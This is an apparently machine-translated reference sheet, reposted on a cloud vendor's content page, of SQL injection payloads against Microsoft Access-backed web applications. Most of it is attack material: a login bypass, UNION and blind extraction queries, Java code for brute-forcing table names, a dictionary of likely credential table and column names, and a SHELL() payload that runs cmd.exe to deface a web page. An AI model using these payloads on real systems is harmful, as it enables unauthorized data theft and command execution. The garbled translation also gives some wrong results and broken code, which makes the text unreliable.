Access SQL Injection Reference Manual (small copy)

Source: Internet
Author: User

Access SQL Injection reference

 

Description SQL query and comment
Annotator Access does not have a special annotator. Therefore, "/*", "--" and "#" cannot be used. However, you can use the NULL character "NULL" (% 00) instead:
  • 'Union SELECT 1, 1 FROM validTableName % 00

Syntax error message "[Microsoft] [Driver ODBC Microsoft Access]"
Multi-sentence execution Not supported.
Joint Query Access supports UNION query. The FROM keyword after UNION must use an existing table name.
Affiliated Query Access supports secondary queries (for example:"TOP 1"Used to return the content of the first line ):
  • 'AND (select top 1 'somedata' FROM validTableName) % 00
LIMIT support LIMIT is not supported, but can be declared in the query"Top n"To limit the number of rows returned:
  • 'Union select top 3 AttrName FROM validTableName % 00: This statement returns 3 rows (first.
Returns 0 rows for the query. It is useful when the script only displays the results of the first query in the returned HTML results:
  • 'AND 1 = 0 union select AttrName1, AttrName2 FROM validTableName % 00
String connection CONCAT () functions are not supported. You can use the "&" or "+" operation to connect two strings. URLencode must be used to encode these two operators:
  • 'Union select' web '% 2b 'app' FROM validTableName % 00: Return "webapp"

  • 'Union select' web '% 26' app' FROM validTableName % 00: Return "webapp"
Substring MID () function:
  • 'Union select mid ('abcd', 1, 1) FROM validTableName % 00: Return ""
  • 'Union select mid ('abcd', 2, 1) FROM validTableName % 00: Return "B"
String Length LEN () function:
  • 'Union select len ('200') FROM validTableName % 00: 4 is returned.
Brute-force WEB path You can perform the SELECT operation on a database that does not exist. Access will respond to an error message containing the complete path .:
  • 'Union SELECT 1 FROM thisafakename. FakeTable % 00
Returns the ASCII value of a character. ASC () function:
  • 'Union select asc ('A') FROM ValidTable % 00: Returns the ASCII value of 65 ('A)
Convert ASCII values to characters CHR () function:
  • 'Union select chr (65) FROM validTableName % 00: 'A' is returned'
IF statement You can use the IIF () function. Syntax: IIF (condition, true, false ):
  • 'Union select iif (1 = 1, 'A', 'B') FROM validTableName % 00: 'A' is returned'
Time Interface There are no functions similar to BENCHMARK () or SLEEP (), but you can use a large number of (high load) queries to achieve this effect.Click here for Reference.
Verify whether the file exists

Use it during injection:

  • 'Union SELECT name FROM msysobjects IN '\ boot. ini' % 00: (If the file exists) an error message is returned: it informs that the database format was not recognized.

Table Name guessing Here is a simple java code to guess the access table name. I wrote it to better explain the principle of table name guessing:


Static private String columnErrorMessage = "...";
Static private String accessError = "...";

[...]

Public String bruteTableName (Request r) {// 0

String resp = new String ();
String [] table = {"tab_name1", "tab_name2",..., "tab_nameN"}; // 1

For (int I = 0; I <table. length; I ++ ){

Resp = sendInjection (r, "'Union SELECT 1 FROM" + table [I] + "% 00"); // 2

If (resp. contains (columnErrorMessage) |! Resp. contains (accessError) // 3
Return table [I];
}

Return null;
}

BruteTableName ()The parameter is an object named "Request" (see Note 0). In this exampleSendInjection ()(See note 2) Try to check the query:

  • 'Union SELECT 1 FROM table [I] % 00

Table [I]Is an element in the Table Name List (see note 1). You can find a small table name list at the end of this article. In Note 2,SendInjection ()The function returns the response html code after the injection code is submitted. IfRespIncludeColumnErrorMessageString (see note 3). Congratulations, you have found an existing table.ColumnErrorMessageThe error message returned when the number of volumes in the UNION query is different from that in the primary query. If the table does not exist, the returned information is that the table does not exist, rather than the number of volumes.

Column name guess The number of columns that require a known table name and primary query:
  • 'Union SELECT fieldName [j], 1,1, 1 FROM validTableName % 00

You can modify the example above (change table to fieldname). If the table does not exist, an error message indicating that the column does not exist will be returned.

Bypass Login User name:'OR 1 = 1% 00(Or"OR 1 = 1% 00)

Password: (leave blank)

Column name Enumeration Additional Terms: This principle has been tested on JBoss (A. jsp script with Access Vulnerability), but cannot be guaranteed to be available in other environments.

In general, if the SQL injection vulnerability exists, when you add a "'" after the URL parameter, you will get some error information, such:

  • Error (...) syntax (...) query (...): "Id = 0 '"
From this information, we can see that the current table has a column "ID ". programmers usually use the same URL parameters, column names, and table names. when you know a parameter, you can use mssql to enumerate other table names and column names:
  • 'Group BY Id % 00

Now you will get a new error message containing another new column name. You can continue to enumerate other table names like this:

  • 'Group BY Id, SecondAttrName,... % 00

Until all table names are obtained.

Interaction with the operating system

These functions are unavailable by default.

Security Prompt You can modify the Registry to lock the use of some controversial functions (such as SHELL (), and so on ...):
  • \ HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Jet \ 4.0 \ engines \ SandboxMode

The default value is 2, so these functions are not available by default. Next I will introduce you to the situation where the registry value is set to 0.

Get Current Directory The number of columns that require a known table name and primary query:
  • 'Union SELECT CurDir (), 1, 1 FROM validTableName % 00
Execute system commands The SHELL () function can be used to execute system commands:
  • 'AND SHELL('cmd.exe/c echo owned> c: \ path \ name \ index.html') % 00

Access System Table

These system tables are not accessible by default.

MSysAccessXML Columns in the table:
  • Id
  • LValue
  • ObjectGuid
  • ObjectName
  • Property
  • Value

 

MSysACEs Columns in the table:
  • ACM
  • FInheritable
  • ObjectId
  • SID
MSysObjects Here we can get the table name:
  • Connect
  • Database
  • DataCreate
  • DataUpdate
  • Flags
  • ForeignName
  • Id
  • Lv
  • LxExtra
  • LvModule
  • LvProp
  • Name
  • Owner
  • ParentId
  • RmtInfoLong
  • RmtInfoShort
  • Type

This query can be used to obtain the table name in the database:

  • 'Union SELECT Name FROM MSysObjects WHERE Type = 1% 00
Access blind note (these steps are used to guess the content of the table)
Step 1: Guess the table name You can use the dictionary provided below to guess the table name. Inject the query statement:
  • 'AND (select top 1 1 FROM TableNameToBruteforce [I]) % 00

After the injection query statement is submitted, if the HTML returned by you is the same as the normal page, the table exists. (because"AND 1"Does not affect the query ).

Step 2: Guess the column name

Use the following query when the table name is instructed:
  • 'AND (select top 1 FieldNameToBruteForce [j] FROM table) % 00

Use the same method as step 1 to determine whether a Column exists.

Step 3: Guess the number of rows In the next step, you must know the number of rows in the table. It will be used in the following query"TAB_LEN"Variable:
  • 'And iif (select count (*) FROM validTableName) = X, 1, 0) % 00

Here"X"Is any value greater than 0. You can use the old method to determine the exact value of "X.

Step 4: Guess the Content Length

You can use the following statement to obtain"ATTRIB"Content Length of the first row of the column:

  • 'And iif (select top 1 LEN (ATTRIB) FROM validTableName) = X, 1, 0) % 00

You can use the following statement to guess"ATTRIB"The second row in the column to the secondTAB_LENThe length of the row content (here the value of N is 2 andTAB_LEN (obtained earlier)):

  • 'And iif (select top n len (ATTRIB) FROM validTableName where attrib <> 'value1' and attrib <> 'value2 '... (etc )...) = KKK, 1, 0) %

"KKK" Any value greater than 0.ATTRIB <> 'valuexxx'The reason is that we have to select a specific row to guess. the method I think of is"TOP N"The row value is excluded, and the remaining row is the row being guessed. Of course, there is a premise here"ATTRIB"Must be a primary key. Here is an example:

 

A1 A2 A3
1111 2222 3333
0000 4444 Oooo
Aaaa Bbbb Cccc

You can obtain the length of all content in the first line as follows:

  • 'And iif (select top 1 LEN (A1) FROM Table) = KKK, 1, 0) % 00

  • 'And iif (select top 1 LEN (A2) FROM Table) = KKK, 1, 0) % 00

  • 'And iif (select top 1 LEN (A3) FROM Table) = KKK, 1, 0) % 00

Then we can obtain the length of the content of the second line (assumingA1Is the table's primary key ):

  • 'And iif (select top 2 LEN (A1) FROM Table WHERE
    A1 <> '20140901') = KKK, 1, 0) % 00

  • 'And iif (select top 2 LEN (A2) FROM Table WHERE
    A1 <> '20140901') = KKK, 1, 0) % 00

  • 'And iif (select top 2 LEN (A3) FROM Table WHERE
    A1 <> '20140901') = KKK, 1, 0) % 00

The third line is the same:

  • 'And iif (select top 3 LEN (A1) FROM Table WHERE
    A1 <> '20160901' AND A1 <> '20160901') = KKK, 1, 0) % 00

  • 'And iif (select top 3 LEN (A2) FROM Table WHERE
    A1 <> '20160901' AND A1 <> '20160901') = KKK, 1, 0) % 00

  • 'And iif (select top 3 LEN (A3) FROM Table WHERE
    A1 <> '20160901' AND A1 <> '20160901') = KKK, 1, 0) % 00

Obviously, you must obtain the content of all the previous rows (you need to put it after WHERE) after you guess the length of the content after the first row (2nd to the TAB_LEN row ).

Step 5: Guess the content Suppose the attacker knows the table and column name, and uses the following query:
  • 'And iif (select top n mid (ATTRIBxxx, XXX, 1) FROM validTableName WHERE ATT_key <> 'value1' AND ATT_key <> 'value2'
    ... Etc...) = CHAR (YYY), 1, 0) % 00

"N"Is the row to be guessed,"XXX"Yes"ATTRIBxxx"The X byte,"ATT_key"Is the primary key of the table."YYY"It is a number between 0 and 255 (it represents the ASCII code of a character). Here we should use the method mentioned above to guess the content of other rows.

Table Name/column name (dictionary)
Table Name/column name (dictionary) Here is a small table/column name sample dictionary, which may be used in the guess:
  •  

    Account, accnt, accnt, user_id, members, usrs, usr2, accounts, admin, admins, adminlogin, auth, authenticate, authentication, account, access;
  • Customers, customer, config, conf, cfg;

  • Hash;

  • Login, logout, loginout, log;

  • Member, memberid;

  • Password, pass_hash, pass, passwd, passw, pword, pwrd, pwd;

  • Store, store1, store2, store3, store4, setting;

  • Username, name, user, user_name, user_username, uname, user_uname, usern, user_usern, un, user_un, usrnm, user_usrnm, usr, usernm, user_usernm, user_nm, user_password, userpass, user_pass, user_pword, user_passw, user_pwrd, user_pwd, user_passwd;


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.